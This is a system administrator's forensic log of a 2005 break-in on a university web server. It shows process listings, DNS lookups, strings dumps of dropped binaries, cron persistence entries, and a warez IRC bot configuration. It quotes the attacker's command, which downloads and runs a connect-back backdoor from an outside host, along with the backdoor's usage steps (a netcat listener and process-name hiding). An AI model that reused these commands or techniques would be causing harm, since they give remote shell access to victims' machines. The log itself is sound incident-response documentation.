hacker broke into igloo.its.unimacq.edu.au on Feb 27! ----------------------------------------------------- [root@igloo httpd]# ps -aef | grep nobody nobody 13150 1 0 Feb27 ? 00:00:00 ./sshd nobody 10887 1 49 11:30 ? 00:05:13 ./sshd nobody 10888 1 49 11:30 ? 00:05:13 ./sshd nobody 10342 1 0 Feb27 ? 00:00:00 ./sh nobody 10402 1 0 Feb27 ? 00:00:00 /tmp/rpcd nobody 13151 1 0 Feb27 ? 00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;cd /tmp;wget http://atomix.localroot.org/html;chmod +x /tmp/html;/tmp/html 210.238.202.150 5453 [terrence@raider Telmann]$ nslookup atomix.localroot.org Server: 137.111.66.5 Address: 137.111.66.5#53 Non-authoritative answer: Name: atomix.localroot.org Address: 69.64.34.186 [terrence@raider Telmann]$ nslookup 210.238.202.150 Server: 137.111.66.5 Address: 137.111.66.5#53 Non-authoritative answer: 150.202.238.210.in-addr.arpa canonical name = 150.144h.202.238.210.in-addr.arpa. 150.144h.202.238.210.in-addr.arpa name = vphone.jp. Authoritative answers can be found from: 144h.202.238.210.in-addr.arpa nameserver = dns7.dion.ne.jp. 144h.202.238.210.in-addr.arpa nameserver = dns.selecom.co.jp. dns7.dion.ne.jp internet address = 210.172.64.81 [root@igloo tmp]# strings html /lib/ld-linux.so.2 libc.so.6 strcpy printf connect atol memcpy execl dup2 system socket send memset shutdown gethostbyname htons exit _IO_stdin_used __libc_start_main close __gmon_start__ GLIBC_2.0 PTRh QVhx [httpd] /bin/bash clear [*] sileC2Bd v1.0 connect-back backd00r coded by Silentium of Anacron Group Italy http://www.autistici.org/anacron-group-italy [*] Use: sileC2Bd <host> <port> ][*][ sileC2Bd v1.0 connect-back backd00r ][*][ coded by Silentium of Anacron Group Italy ][*][ http://www.autistici.org/anacron-group-italy 0x00d34d Error, don't get host by name 0x00d34d Error, don't create socket 0x00d34d Error, don't connecting at host [root@igloo tmp]# strings rpcd /lib/ld-linux.so.2 libc.so.6 strcpy waitpid ioctl stdout execve memcpy perror dup2 socket select fflush bzero setpgid accept write kill bind chdir memchr signal read htonl listen fork sprintf htons exit _IO_stdin_used __libc_start_main strlen open vhangup setsid close __gmon_start__ GLIBC_2.0 PTRh$ pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty socket bind listen Daemon is starting... OK, pid = %d /dev/null HOME=%s Can't fork pty, bye! /bin/sh sileC2Bd v1.0 can be downloaded from <http://www.autistici.org/anacron-group-italy/sources.html> How compile and use sileC2Bd ---------------------------- Step 1: gcc sileC2Bd.c -o sileC2Bd Step 2: Run netcat in your localhost or other host, and open an arbitrary port. ./nc -l -p 7000 The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and source routing. Unlike telnet, nc scripts nicely, and separates error messages onto standard error instead of sending them to standard output, as telnet does with some. -l Is used to specify that nc should listen for an incoming connection, rather than initiate a connection to a remote host. Any hostname/IP address and port arguments restrict the source of inbound connections to only that address and source port. -p port. Specifies the source port nc should use, subject to privilege restrictions and availability. Step 3: Run sileC2Bd in victim host ./sileC2Bd yourhost.org 7000 And now in your shell where netcat running, is appeared the backdoor's banner, now you can execute *nix commands on victim host root@localhost:~# nc -l -p 7000 ][*][ sileC2Bd v1.0 connect-back backd00r ][*][ coded by Silentium of Anacron Group Italy ][*][ http://www.autistici.org/anacron-group-italy id uid=0(root) gid=0(root) sileC2Bd is hidden ------------------ sileC2Bd's process is hidden by: #define HIDE "[httpd]" This string simulates an *nix process, and real name of process is hidden at ps and similar commands: ps -waux root 1710 0.0 0.0 1348 256 pts/3 S 06:01 0:00 [httpd] netstat -nap --inet tcp 0 0 66.66.66.66:34039 10.10.10.10:7000 ESTABLISHED 2429/[httpd] [root@igloo cron]# pwd /var/spool/cron [root@igloo cron]# ls -al nobody -rw------- 1 root nobody 483 Feb 27 12:08 nobody [root@igloo cron]# cat nobody # DO NOT EDIT THIS FILE - edit the master and reinstall. # (a.txt installed on Sun Feb 27 12:08:30 2005) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../.k/sshd 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/httpd -b /tmp/.../.../.../d/httpd.conf 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/mud/bin/sh 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../zb [root@igloo ...]# pwd /tmp/.../.../... [root@igloo ...]# ls -al total 20 drwxr-xr-x 4 nobody nobody 4096 Feb 27 12:08 . drwxr-xr-x 3 nobody nobody 4096 Feb 27 06:32 .. -rw-r--r-- 1 nobody nobody 304 Feb 6 15:49 a.txt drwxr-xr-x 3 nobody nobody 4096 Feb 27 12:08 d drwxr-xr-x 2 nobody nobody 4096 Feb 27 12:08 .k [root@igloo ...]# cat a.txt 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../.k/sshd 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/httpd -b /tmp/.../.../.../d/httpd.conf 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../d/mud/bin/sh 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /tmp/.../.../.../zb [root@igloo d]# pwd /tmp/.../.../.../d [root@igloo d]# ls -al total 248 drwxr-xr-x 3 nobody nobody 4096 Feb 27 12:08 . drwxr-xr-x 4 nobody nobody 4096 Feb 27 12:08 .. -rwxr-xr-x 1 nobody nobody 232711 Jan 18 12:50 httpd -rw-r--r-- 1 nobody nobody 1081 Feb 6 15:41 httpd.conf drwxr-xr-x 10 nobody nobody 4096 Feb 27 06:32 mud [root@igloo d]# strings httpd ... iroffer v1.3.b09 [20040823145936] by PMG, see http://iroffer.org/ Usage: %s [-vc] [-bdkns] [-u user] [-t dir] configfile [ configfile ... ] -v Print version and exit. -c Generate encrypted password and exit. -d Increase debug level -b Go to background mode -k Attempt to adjust ulimit to allow core files -n No colors in foreground mode -s No screen manipulation in foreground mode -u user Run as user (you have to start as root). -t dir Chroot to dir (you have to start as root). ... iroffer is a software program that acts as a fileserver for IRC. It is similar to a FTP server or WEB server, but users can download files using the DCC protocol of IRC instead of a web browser. [root@igloo d]# cat httpd.conf user_nick [wP]-N #channel #Warezpunks -plist 10 -pformat full #channel #indaglo -plist 10 -pformat full slotsmax 20 queuesize 100 pidfile .pid #logfile /dev/.log logstats no logrotate weekly statefile .state connectionmethod direct server ccdxf.cjb.net 6667 server ccdxf.cjb.net 6668 server ccdxf.cjb.net 6669 server ccdxf.cjb.net 7000 server ccdxf.cjb.net 7331 server kccdxf.cjb.net channel #wp.bots -plist 20 user_realname 5,0FrEaK0,050201 user_modes +ixB loginname wP maxtransfersperperson 1 maxqueueditemsperperson 2 filedir /tmp/.../.../.../.a restrictlist restrictprivlist restrictprivlistmsg Wait for public list in the channel or join #wP to search. respondtochannelxdcc downloadhost *!*@* headline 5,0WaReZ0,05pUnKs creditline 5,0WaReZ0,05pUnKs adminpass t0z4.r6/Atb5o adminhost *0201!*pjax5@*.de.comcast.net adminhost *0201!*pjax5@xxxxx adminhost *0201!*@*TH.EM* adminhost *!*@*.global-dimension.org adminhost *599!*@*SeKsI.InDiaN.Association uploadhost *!*@* uploaddir /tmp/.../.../.../ uploadmaxsize 6000 hideos [root@igloo mud]# pwd /tmp/.../.../.../d/mud [root@igloo mud]# ls -R .: bin etc info lib log man msg share var ./bin: sh ./etc: hump muddleftpd ./etc/muddleftpd: muddleftpd.conf ./info: muddleftpd.info ./lib: muddleftpd ./lib/muddleftpd: libauthsmb.so ./man: man1 ./man/man1: ftpwho.1 muddleftpd.1 mudpasswd.1 ./msg: ./share: doc ./share/doc: muddleftpd ./share/doc/muddleftpd: cookie.txt muddleftpd.txt mudpasswd.txt reference.txt ftpcmds.txt mudlogd.txt README.authsmb ./var: lock ./var/lock: muddleftpd.scratch Muddleftpd is a secure, lightweight and flexible FTP server originally written by Beau Kuiper. The server was designed to allow a vast number of configurations; from closely integrating with the system and using PAM to running as a non-root user with per-directory configurations. Yet it also manages to be easy to set up. The small size of the daemon helps make it very resource efficient, yet it doesn't compromise at all in functionality. In fact it offers a number of extra features to help with security. Most noticable is the fact that unlike most FTP servers currently available the daemon has no need for root privilegdes, therefore even if the daemon is compromised a malicious user will have no elevated access. [root@igloo .k]# pwd /tmp/.../.../.../.k [root@igloo .k]# ls -al total 44 drwxr-xr-x 2 nobody nobody 4096 Feb 27 12:08 . drwxr-xr-x 4 nobody nobody 4096 Feb 27 12:08 .. -rwxr-xr-x 1 nobody nobody 34979 Feb 20 19:08 sshd [root@igloo .3]# pwd /tmp/.3 [root@igloo .3]# ls -al total 1316 drwxr-xr-x 2 nobody nobody 4096 Feb 27 14:04 . drwxrwxrwt 6 root root 897024 Mar 9 12:54 .. -rwxr-xr-x 1 nobody nobody 437370 Feb 25 20:53 a.out |